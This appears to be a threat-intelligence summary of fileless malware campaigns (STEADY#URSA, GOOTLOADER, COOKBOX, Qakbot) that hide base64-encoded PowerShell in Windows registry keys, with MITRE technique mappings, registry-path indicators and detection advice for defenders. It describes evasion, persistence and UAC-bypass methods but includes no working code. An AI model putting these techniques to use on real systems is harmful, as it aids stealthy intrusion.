Threat actors are increasingly using fileless code execution through the Windows registry to evade traditional AV/EDR detections. The article shows real-world examples (STEADY#URSA/SUBTLE#PAWS, GOOTLOADER, COOKBOX, Qakbot) and outlines practical detection approaches leveraging Sysmon and PowerShell logs.
#SUBTLEPAWS #STEADYURSA #GOOTLOADER #COOKBOX #Qakbot #CERT-UA #Ukraine
#SUBTLEPAWS #STEADYURSA #GOOTLOADER #COOKBOX #Qakbot #CERT-UA #Ukraine
Keypoints
- Fileless malware executes in memory or in non-disk locations, leaving minimal artifacts for traditional antivirus.
- The Windows registry is used as a persistence and execution layer, enabling code to run without writing to disk.
- STEADY#URSA/SUBTLE#PAWS stores large chunks of base64-encoded PowerShell in registry keys and executes it in memory.
- GOOTLOADER uses multiple registry keys under HKCU to store payloads and employs in-memory loading (FONELAUNCH) to evade detection.
- COOKBOX abuses obfuscated PowerShell stored in registry keys (e.g., within XLS-based infection vectors) to download and execute PowerShell from C2 sources.
- Qakbot uses registry injection with long base64 payloads and a scheduled task to execute decoded content.
- Detection focuses on endpoint telemetry (Sysmon, PowerShell logs) and threat hunting queries around Set-ItemProperty, registry changes, and PowerShell activity.
MITRE Techniques
- [T1059.001] PowerShell – PowerShell-based backdoor uses base64-encoded code loaded from registry and executed with Get-ItemProperty and Invoke-Expression. ‘base64 encoded PowerShell was decoded and dumped into various registry keys inside of the HKCUSystem directory.’
- [T1112] Modify Registry – Attackers store and execute code by placing PowerShell functions as registry keys; ‘the initial backdoor code stored each PowerShell function as its own unique registry key formatted as null-terminated strings.’
- [T1547.001] Registry Run Keys/Startup Folder – Registry is used to establish persistence by leveraging Windows Startup/Run keys to execute code. ‘The registry is used to establish persistence by leveraging windows Startup/Run keys to execute code.’
- [T1548.002] Bypass User Account Control – Techniques include executing code for UAC bypass purposes via registry-based methods. ‘…UAC bypass purposes.’
- [T1027] Obfuscated/Compressed Files and Information – Code is heavily obfuscated/encoded within registry entries. ‘layers of heavily obfuscated and encoded code.’
- [T1053.005] Scheduled Task – Attacker creates a scheduled task along with registry keys to run decoded payloads. ‘a scheduled task was created along with three unique registry keys…’
- [T1105] Ingress Tool Transfer – Payloads are downloaded and executed, sometimes from C2 servers or external sources (e.g., Github). ‘PowerShell scripts that handle the download and execution functionality of PowerShell commandlets from C2 servers.’
Indicators of Compromise
- [Registry Key/Value] Registry-based payload locations – example: HKCUSOFTWAREMicrosoftPhone%USERNAME%0, HKCUSOFTWAREMicrosoftPhone%USERNAME%
- [Registry Key/Value] Example containing PowerShell code – example: result_code under HKUSystem, with suspicious PowerShell in the value
- [Domain] GitHub – example: github.com as a source for downloaded PowerShell payloads
- [Document] XLS Office documents containing malicious VBA – example: XLS documents used to deliver PowerShell code